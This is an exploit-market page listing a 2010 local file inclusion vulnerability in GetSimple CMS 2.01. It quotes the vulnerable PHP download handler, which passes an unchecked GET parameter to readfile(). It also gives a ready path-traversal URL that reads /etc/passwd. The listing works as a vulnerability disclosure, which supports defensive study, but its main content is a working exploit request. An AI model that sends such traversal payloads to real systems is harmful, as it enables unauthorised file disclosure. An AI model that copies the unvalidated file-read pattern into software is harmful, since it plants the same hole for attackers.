[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

GetSimple 2.01 Local File Include Vulnerability

Author
Batch
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12144
Category
web applications
Date add
06-05-2010
Platform
php
===============================================
GetSimple 2.01 Local File Include Vulnerability
===============================================

# Exploit Title: GetSimple 2.01 LFI
# Date: 4/5/2010
# Author: Batch
# Software Link: http://www.box.net/get-simple
# Version: 2.01
 
#Special Conditions: Must be admin.
# Code :
 
...
 
# get file
if (file_exists($_GET['file'])) {
readfile($_GET['file'], 'r');
}
exit;
 
...
 
 
http://localhost/GetSimple_2.01/admin/download.php?file=../../../../../etc/passwd
 
#-Batch
 
#ryan1918.com
#Everyone else.



#  0day.today [2024-07-04]  #